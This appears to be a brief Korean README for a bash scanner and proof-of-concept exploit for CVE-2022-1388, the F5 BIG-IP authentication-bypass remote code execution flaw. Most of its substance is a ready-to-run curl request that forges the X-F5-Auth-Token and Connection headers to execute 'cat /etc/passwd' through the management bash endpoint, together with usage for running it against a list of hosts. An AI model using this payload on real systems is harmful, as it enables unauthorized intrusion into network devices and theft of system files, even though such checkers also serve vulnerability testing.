
Bash 기반 검사기 및 F5 BIG-IP의 CVE-2022-1388 원격 코드 실행(RCE)을 위한 개념 증명 익스플로잇으로, curl 기반 페이로드 실행을 통해 취약한 호스트의 자동화된 확인을 가능하게 합니다.
CVE-2022-1388 RCE(F5 BIG-IP)를 확인하는 간단한 bash 스크립트입니다.
[+] 사용법: ./CVE-2022-1388.sh hosts.txt
IP 주소를 변경하는 것을 잊지 마세요.
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"